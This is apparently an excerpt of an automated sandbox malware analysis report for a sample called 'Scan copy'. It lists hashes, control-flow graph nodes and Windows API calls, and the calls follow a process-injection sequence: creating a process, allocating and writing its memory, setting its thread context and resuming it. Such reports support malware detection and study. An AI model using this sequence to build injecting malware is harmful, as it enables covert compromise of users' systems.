                              • Opcode Fuzzy Hash: 58b53b7c0abd3b92e734f3a35b9ed7b4569f011dce57f4e5697dbf4320ab0d49
                              • Instruction Fuzzy Hash: 85818174E002189FEB14DFA9C850AEEBBB2FF88310F148069E519BB365DB356946DF50
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 36861bfe2ffbbad573c0268888a6607feee88d26942b24704c09c56b0bb7a5d6
                              • Instruction ID: 21b548ad1f17d2462addce3cd2d7bb5a4149f8f3d1c68d0f92639cf58db62dfc
                              • Opcode Fuzzy Hash: 36861bfe2ffbbad573c0268888a6607feee88d26942b24704c09c56b0bb7a5d6
                              • Instruction Fuzzy Hash: 30819174E002189FEB14DFA9C850AEEBBB2FF88310F148069E519BB365DA356946DF50
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eff8fffd23a445b5cfc805733ddae7aa3458a523ff3fb3e8d9f187cc10eac607
                              • Instruction ID: 8795b680e7c5465428acaf9d64f5b148191189cd358cee5c9723689df584212e
                              • Opcode Fuzzy Hash: eff8fffd23a445b5cfc805733ddae7aa3458a523ff3fb3e8d9f187cc10eac607
                              • Instruction Fuzzy Hash: E5E0BF34D5A114DFD7A0EF95E5515F8B7F8AF4A215F013066940EA3251DA306941CB80

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 635 6c89c40-6c89cd5 637 6c89d0e-6c89d2e 635->637 638 6c89cd7-6c89ce1 635->638 645 6c89d30-6c89d3a 637->645 646 6c89d67-6c89d96 637->646 638->637 639 6c89ce3-6c89ce5 638->639 640 6c89d08-6c89d0b 639->640 641 6c89ce7-6c89cf1 639->641 640->637 643 6c89cf3 641->643 644 6c89cf5-6c89d04 641->644 643->644 644->644 647 6c89d06 644->647 645->646 648 6c89d3c-6c89d3e 645->648 652 6c89d98-6c89da2 646->652 653 6c89dcf-6c89e89 CreateProcessA 646->653 647->640 650 6c89d40-6c89d4a 648->650 651 6c89d61-6c89d64 648->651 654 6c89d4c 650->654 655 6c89d4e-6c89d5d 650->655 651->646 652->653 656 6c89da4-6c89da6 652->656 666 6c89e8b-6c89e91 653->666 667 6c89e92-6c89f18 653->667 654->655 655->655 657 6c89d5f 655->657 658 6c89da8-6c89db2 656->658 659 6c89dc9-6c89dcc 656->659 657->651 661 6c89db4 658->661 662 6c89db6-6c89dc5 658->662 659->653 661->662 662->662 663 6c89dc7 662->663 663->659 666->667 677 6c89f28-6c89f2c 667->677 678 6c89f1a-6c89f1e 667->678 680 6c89f3c-6c89f40 677->680 681 6c89f2e-6c89f32 677->681 678->677 679 6c89f20 678->679 679->677 683 6c89f50-6c89f54 680->683 684 6c89f42-6c89f46 680->684 681->680 682 6c89f34 681->682 682->680 686 6c89f66-6c89f6d 683->686 687 6c89f56-6c89f5c 683->687 684->683 685 6c89f48 684->685 685->683 688 6c89f6f-6c89f7e 686->688 689 6c89f84 686->689 687->686 688->689 691 6c89f85 689->691 691->691
                              APIs
                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C89E76
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 8c50b32ec65e0a984191150b05edea2e8d299c0e0bbb50a2488822d8f69272f3
                              • Instruction ID: 689b3919a9587971c288d20e129873a6c7fd444b788c6a47374ff046e3619e84
                              • Opcode Fuzzy Hash: 8c50b32ec65e0a984191150b05edea2e8d299c0e0bbb50a2488822d8f69272f3
                              • Instruction Fuzzy Hash: 5C915C71D003599FDF64DF68C841BEEBBB2BF44314F0485AAE809A7240DB759A85CF91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 578 6c89c3d-6c89cd5 580 6c89d0e-6c89d2e 578->580 581 6c89cd7-6c89ce1 578->581 588 6c89d30-6c89d3a 580->588 589 6c89d67-6c89d96 580->589 581->580 582 6c89ce3-6c89ce5 581->582 583 6c89d08-6c89d0b 582->583 584 6c89ce7-6c89cf1 582->584 583->580 586 6c89cf3 584->586 587 6c89cf5-6c89d04 584->587 586->587 587->587 590 6c89d06 587->590 588->589 591 6c89d3c-6c89d3e 588->591 595 6c89d98-6c89da2 589->595 596 6c89dcf-6c89e89 CreateProcessA 589->596 590->583 593 6c89d40-6c89d4a 591->593 594 6c89d61-6c89d64 591->594 597 6c89d4c 593->597 598 6c89d4e-6c89d5d 593->598 594->589 595->596 599 6c89da4-6c89da6 595->599 609 6c89e8b-6c89e91 596->609 610 6c89e92-6c89f18 596->610 597->598 598->598 600 6c89d5f 598->600 601 6c89da8-6c89db2 599->601 602 6c89dc9-6c89dcc 599->602 600->594 604 6c89db4 601->604 605 6c89db6-6c89dc5 601->605 602->596 604->605 605->605 606 6c89dc7 605->606 606->602 609->610 620 6c89f28-6c89f2c 610->620 621 6c89f1a-6c89f1e 610->621 623 6c89f3c-6c89f40 620->623 624 6c89f2e-6c89f32 620->624 621->620 622 6c89f20 621->622 622->620 626 6c89f50-6c89f54 623->626 627 6c89f42-6c89f46 623->627 624->623 625 6c89f34 624->625 625->623 629 6c89f66-6c89f6d 626->629 630 6c89f56-6c89f5c 626->630 627->626 628 6c89f48 627->628 628->626 631 6c89f6f-6c89f7e 629->631 632 6c89f84 629->632 630->629 631->632 634 6c89f85 632->634 634->634
                              APIs
                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06C89E76
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: d133d6cc1f110610a344d1a022759c6fc13774cc099c75152730bdb77bb58fd9
                              • Instruction ID: 8134db9030f5ecea6e0b97e203b7511708ea831905846c6effa71d86a22ca707
                              • Opcode Fuzzy Hash: d133d6cc1f110610a344d1a022759c6fc13774cc099c75152730bdb77bb58fd9
                              • Instruction Fuzzy Hash: 6B915C71D003599FDF64DF68C8417EEBBB2BF44314F0485AAE809A7240DB759A85CF91

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 692 b44544-b45e99 CreateActCtxA 695 b45ea2-b45efc 692->695 696 b45e9b-b45ea1 692->696 703 b45efe-b45f01 695->703 704 b45f0b-b45f0f 695->704 696->695 703->704 705 b45f20 704->705 706 b45f11-b45f1d 704->706 708 b45f21 705->708 706->705 708->708
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 00B45E89
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: a6fa6660b1301032ce5f9e951a56be63f8cc7c33c1fae05a365c1d3c7d2af4e8
                              • Instruction ID: 3c15a218e560f8e6bd085a841f81de503fed45101893f890dad26c86d994687f
                              • Opcode Fuzzy Hash: a6fa6660b1301032ce5f9e951a56be63f8cc7c33c1fae05a365c1d3c7d2af4e8
                              • Instruction Fuzzy Hash: 8741D571C00B1DCBDB24DFA9C84478DBBF5BF48304F208169D409AB255DB756A4ACF90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 709 b45dd7-b45e99 CreateActCtxA 711 b45ea2-b45efc 709->711 712 b45e9b-b45ea1 709->712 719 b45efe-b45f01 711->719 720 b45f0b-b45f0f 711->720 712->711 719->720 721 b45f20 720->721 722 b45f11-b45f1d 720->722 724 b45f21 721->724 722->721 724->724
                              APIs
                              • CreateActCtxA.KERNEL32(?), ref: 00B45E89
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: e27253ff421120e94379f989dd95662ba390d4114a6fa5272ded046444086fc3
                              • Instruction ID: 11cc8298fbf8070cdf12da5f31460e26304c1d4878afc35b0708b2b8c0237795
                              • Opcode Fuzzy Hash: e27253ff421120e94379f989dd95662ba390d4114a6fa5272ded046444086fc3
                              • Instruction Fuzzy Hash: 1041E371C00B19CFDB24DFA9C84478DBBF5BF48304F20816AD418AB255DB756A4ACF50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 725 5957668-595767a 726 5957682-595768d 725->726 727 595767d call 595420c 725->727 728 59576a2-5957734 CreateIconFromResourceEx 726->728 729 595768f-595769f 726->729 727->726 733 5957736-595773c 728->733 734 595773d-595775a 728->734 733->734
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID: CreateFromIconResource
                              • String ID:
                              • API String ID: 3668623891-0
                              • Opcode ID: 7cd4605709f029a91cb74fe2a4e9ab30db4c3e5ffbb78c492270acbe857bfb8d
                              • Instruction ID: 716648ac97693be68bdd9c818d1ceaf66b3cf1b055e9c1f50e671498852c3ab3
                              • Opcode Fuzzy Hash: 7cd4605709f029a91cb74fe2a4e9ab30db4c3e5ffbb78c492270acbe857bfb8d
                              • Instruction Fuzzy Hash: 1D31BC719043599FCB11DFA9D844ADEBFF8EF49320F04805AE954EB261C3359964CFA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 737 5956810-5956864 739 5956866-595686c 737->739 740 595686f-595687e 737->740 739->740 741 5956880 740->741 742 5956883-59568bc DrawTextExW 740->742 741->742 743 59568c5-59568e2 742->743 744 59568be-59568c4 742->744 744->743
                              APIs
                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 059568AF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID: DrawText
                              • String ID:
                              • API String ID: 2175133113-0
                              • Opcode ID: e7602ccc1bd973855e37a071123ffae0a84559fcd2b897c25727c9e13a6a17e8
                              • Instruction ID: 57dcafee721692d1592250c24a98beb826c9eaacf9d2ec09f6324f5921217883
                              • Opcode Fuzzy Hash: e7602ccc1bd973855e37a071123ffae0a84559fcd2b897c25727c9e13a6a17e8
                              • Instruction Fuzzy Hash: 4A31FDB5D003099FDB10CF9AD884A9EBBF9BB48220F54842AE919A7310D775A914CFA0

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 747 6c899b3-6c89a06 749 6c89a08-6c89a14 747->749 750 6c89a16-6c89a55 WriteProcessMemory 747->750 749->750 752 6c89a5e-6c89a8e 750->752 753 6c89a57-6c89a5d 750->753 753->752
                              APIs
                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C89A48
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: 113060121f428f1c7e7ffacc2a2cf79ce834f918760d0eca75ce081d0d9598dd
                              • Instruction ID: 015dee4daee814bc4622d6b3d582fe448818e1583f47172cb625caa5d348a239
                              • Opcode Fuzzy Hash: 113060121f428f1c7e7ffacc2a2cf79ce834f918760d0eca75ce081d0d9598dd
                              • Instruction Fuzzy Hash: 4A2164B5D003599FDB10DFA9C981BEEBBF5FF48314F10842AE919A7240C7789945CBA4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 766 6c899b8-6c89a06 768 6c89a08-6c89a14 766->768 769 6c89a16-6c89a55 WriteProcessMemory 766->769 768->769 771 6c89a5e-6c89a8e 769->771 772 6c89a57-6c89a5d 769->772 772->771
                              APIs
                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06C89A48
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: MemoryProcessWrite
                              • String ID:
                              • API String ID: 3559483778-0
                              • Opcode ID: ce0299fefcb24e47eea896b4a87b7f3c96599167ea29ed57336327c6889dd251
                              • Instruction ID: 5cd8a737cdab5375c99118eb1543e5dc3c894407b522994f2d47ea77b2cbd48a
                              • Opcode Fuzzy Hash: ce0299fefcb24e47eea896b4a87b7f3c96599167ea29ed57336327c6889dd251
                              • Instruction Fuzzy Hash: 51213675D003499FDB10DFAAC881BEEBBF5FF48314F50842AE919A7240C7799945CBA4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 757 5956818-5956864 758 5956866-595686c 757->758 759 595686f-595687e 757->759 758->759 760 5956880 759->760 761 5956883-59568bc DrawTextExW 759->761 760->761 762 59568c5-59568e2 761->762 763 59568be-59568c4 761->763 763->762
                              APIs
                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 059568AF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID: DrawText
                              • String ID:
                              • API String ID: 2175133113-0
                              • Opcode ID: 33dd739821bc9a0e0b9feb90a81fb2c218f12a23327794cde029a44dca33c70a
                              • Instruction ID: e9ff558bcef94414d3a02cf3bf867ceac76a2d81bcfa056939337800d2f0da9d
                              • Opcode Fuzzy Hash: 33dd739821bc9a0e0b9feb90a81fb2c218f12a23327794cde029a44dca33c70a
                              • Instruction Fuzzy Hash: 2F21CCB5D003499FDB10CF9AD884A9EFBF9FB48320F54842AE919A7310D775A954CFA0
                              APIs
                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B4D76E,?,?,?,?,?), ref: 00B4D82F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd
                              Similarity
                              • API ID: DuplicateHandle
                              • String ID:
                              • API String ID: 3793708945-0
                              • Opcode ID: a74563e83db6b39e3721262ff4e201954ddfde6d1fb7a5d59ba4ac2739b0bd21
                              • Instruction ID: a17cf39b304bc9ff9c85c08a51fcf41c157e32f22885704ae72ccfc9b6103a95
                              • Opcode Fuzzy Hash: a74563e83db6b39e3721262ff4e201954ddfde6d1fb7a5d59ba4ac2739b0bd21
                              • Instruction Fuzzy Hash: 8821E5B5D002499FDB10CF9AD984AEEBBF5FB48310F14805AE914A7350D379A944DFA4
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C89466
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: a3070819a9f74af507aeaf5ff49026fdc73e645f318e2f043beded85b23ecc6c
                              • Instruction ID: 3414a093c502ed6491b560996e4d533483674973bc34ff9bc87b8f4d62701342
                              • Opcode Fuzzy Hash: a3070819a9f74af507aeaf5ff49026fdc73e645f318e2f043beded85b23ecc6c
                              • Instruction Fuzzy Hash: 3D2168B1D003098FDB20DFA9C8817EEBBF4AF88314F54842AD459A7340DB789A45CFA4
                              APIs
                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06C89B28
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: b54b28a8567edbe1d5afdd26a7cbb18450eedb9daf531188302e2e8336dca137
                              • Instruction ID: bcfb09938633865afe078b180fceab7e7519c431c67dba44205ca9a2ca783ecd
                              • Opcode Fuzzy Hash: b54b28a8567edbe1d5afdd26a7cbb18450eedb9daf531188302e2e8336dca137
                              • Instruction Fuzzy Hash: 832125B1D003599FDB10DFA9C881BEEBBF1FF48310F50842AE919A7240C7389901CBA0
                              APIs
                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C89466
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: f82eb8b541cd231df17df7b0436f028f4e3b4d715d60a2ce216506f65cf6cb40
                              • Instruction ID: 204a89042ca5f213c5fa8d69cda56b8db68464f3dbb52039c643caa4585d9f9b
                              • Opcode Fuzzy Hash: f82eb8b541cd231df17df7b0436f028f4e3b4d715d60a2ce216506f65cf6cb40
                              • Instruction Fuzzy Hash: 8A210771D003098FDB20DFAAC885BAEBBF4AB88214F548429D559A7240DB789945CFA5
                              APIs
                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06C89B28
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 93d87e32f10e9dcc0cb11cd2093447d6a50094dc805544c34161f43588dc7291
                              • Instruction ID: 4f52b4f1bce764fa82c257f7194902ab9879baa5aa245f1f5222ca75af897fa8
                              • Opcode Fuzzy Hash: 93d87e32f10e9dcc0cb11cd2093447d6a50094dc805544c34161f43588dc7291
                              • Instruction Fuzzy Hash: 0221E671C003499FDB20DFAAC841BEEBBF5FF48310F50842AE919A7240D7799945DBA5
                              APIs
                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,05957682,?,?,?,?,?), ref: 05957727
                              Memory Dump Source
                              • Source File: 00000000.00000002.1295727036.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5950000_Scan copy.jbxd
                              Similarity
                              • API ID: CreateFromIconResource
                              • String ID:
                              • API String ID: 3668623891-0
                              • Opcode ID: 3a4c7b29680fd8f1a3ba8f98f3f6a5b86d01701f9bef62826e031e061e8fa532
                              • Instruction ID: 52625ae35b6bcc94bcc0c4dcd3d2aa4add5b90d1ba037c4f0c410e834d93d193
                              • Opcode Fuzzy Hash: 3a4c7b29680fd8f1a3ba8f98f3f6a5b86d01701f9bef62826e031e061e8fa532
                              • Instruction Fuzzy Hash: F1116AB580034D9FDB10CFAAD844BDEBFF8EB48320F14841AE955A7250C335A954CFA4
                              APIs
                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06C89966
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 3b137704f2ecc8f958913bb8e24dc347e3ca79e5c036878b4e9e78ddaf80238c
                              • Instruction ID: c22448fe6558e1a3dbdf885e22961a0e059153ea572f0033530a0ec7ddc26a62
                              • Opcode Fuzzy Hash: 3b137704f2ecc8f958913bb8e24dc347e3ca79e5c036878b4e9e78ddaf80238c
                              • Instruction Fuzzy Hash: 28115671C003498FDB20DFAAC844BEFBBF5AB48320F248819E519A7250CB369944CFA0
                              APIs
                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06C89966
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 35ad6934011c4bd65dcf0e372451f92dfea1cc3bd6201d8c78f440ba2589b224
                              • Instruction ID: 21743a60048c706951ae378d98c5b8913156ba29234ac57bc199bdd9ea79a763
                              • Opcode Fuzzy Hash: 35ad6934011c4bd65dcf0e372451f92dfea1cc3bd6201d8c78f440ba2589b224
                              • Instruction Fuzzy Hash: D8112375C003499FDB20DFAAC845BEEBBF5EB48324F148419E919A7250CB76A940CFA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 3cc6f48bb63eb04c15937196fce4db543aadbc50f8b021b9c222632e31b4a69e
                              • Instruction ID: 376483cca128ca4329735880160bce9ce7698114004d5755fce8640264ba8574
                              • Opcode Fuzzy Hash: 3cc6f48bb63eb04c15937196fce4db543aadbc50f8b021b9c222632e31b4a69e
                              • Instruction Fuzzy Hash: 6D1158B5C003498FDB20DFA9C8457EEBBF5AB48224F24881AC419A7240CA356941CBA4
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 1b3a55f1a8c2f87d98b1b40c5eb19dd45cbe9ed603f79373f69c32cb425f72d0
                              • Instruction ID: c2357ca0b23b7baa3c46a8707dafa24b9a9718c215cf62f2594d79f8c513e1a6
                              • Opcode Fuzzy Hash: 1b3a55f1a8c2f87d98b1b40c5eb19dd45cbe9ed603f79373f69c32cb425f72d0
                              • Instruction Fuzzy Hash: 50113A71D003498FDB20DFAAC8457AEFBF5EB48324F148419D519A7240CB756945CFA4
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C8DFED
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 42ea2dc9ffdaaac34f1cce13917c2008f0927554d8f37ad54fd9dcc7fbab34e9
                              • Instruction ID: 2fcd638a5e7de1554aca8d8c6f78c733ff6168931fc97d227860b3b9cf30204e
                              • Opcode Fuzzy Hash: 42ea2dc9ffdaaac34f1cce13917c2008f0927554d8f37ad54fd9dcc7fbab34e9
                              • Instruction Fuzzy Hash: 201103B5C00349DFDB20DF9AC845BDEBBF8EB48324F108459E519A7240C375A944CFA5
                              APIs
                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06C8DFED
                              Memory Dump Source
                              • Source File: 00000000.00000002.1297034848.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6c80000_Scan copy.jbxd
                              Similarity
                              • API ID: MessagePost
                              • String ID:
                              • API String ID: 410705778-0
                              • Opcode ID: 373fc660a6553e4819da3d513e5da0baa8f462c8e14b4f7cbc20f3906d7c3191
                              • Instruction ID: 966a5e7152cbe2ec6d4faf65a6039297a581ff5fd11caede9cf138d96e996c94
                              • Opcode Fuzzy Hash: 373fc660a6553e4819da3d513e5da0baa8f462c8e14b4f7cbc20f3906d7c3191
                              • Instruction Fuzzy Hash: 711103B58003499FDB20DF9AC985BDEBBF8EB48324F10841AE559A7240C375A944CFA0
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000), ref: 00B4B51E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290981809.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_b40000_Scan copy.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 49836323d4ca92423855e56d13ea69a6316e52c4d310cc2980aa6ad66f64d1d0
                              • Instruction ID: 4c273e1b3b0e423b7127800a04a42b5892fdb445cc1bc3543e9b92d8c1efe972
                              • Opcode Fuzzy Hash: 49836323d4ca92423855e56d13ea69a6316e52c4d310cc2980aa6ad66f64d1d0
                              • Instruction Fuzzy Hash: 9A1113B6C003498FCB10CF9AD444BDEFBF4EB48314F14845AD519A7200D375A645CFA1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9ee4426b201cca2e2621e6fa3e79c6f151ae937c8b55962fcede04957a88a04e
                              • Instruction ID: 3c0dd4edebd1420349bdef33789613bf1367be0eacb11c225a952ed3fda48527
                              • Opcode Fuzzy Hash: 9ee4426b201cca2e2621e6fa3e79c6f151ae937c8b55962fcede04957a88a04e
                              • Instruction Fuzzy Hash: F2214871504284DFDB16DF00D9C0B16BB65FBA8324F20C569E8090F2E6D33AEC46CBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290310794.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9ed000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8da73d2728f8c91a9d551ab811653fb4e25df283f34817d59628fe20a21617d7
                              • Instruction ID: a548eda0975b086f21aa1f7139e67bdac840511faba34606c2a2cc9ab13f97d3
                              • Opcode Fuzzy Hash: 8da73d2728f8c91a9d551ab811653fb4e25df283f34817d59628fe20a21617d7
                              • Instruction Fuzzy Hash: 9F212871505280DFDB16DF14D9C0B26BF65FB94318F20C569E8050B25AC736DC56CBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290800753.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_afd000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: efbcdc151a4184e55c05f446d52c87daea2fe0c623fe1f426cfd9924605cd12a
                              • Instruction ID: 02f502be08c50c1c5110593fb67378e43f2ce527f84b1dca4293d3987858c59f
                              • Opcode Fuzzy Hash: efbcdc151a4184e55c05f446d52c87daea2fe0c623fe1f426cfd9924605cd12a
                              • Instruction Fuzzy Hash: CA212271604308EFDB16DF50D9C4B26BB62FB84314F20C56DEA4A4B386CB36D807CA62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1290800753.0000000000AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AFD000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_afd000_Scan copy.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
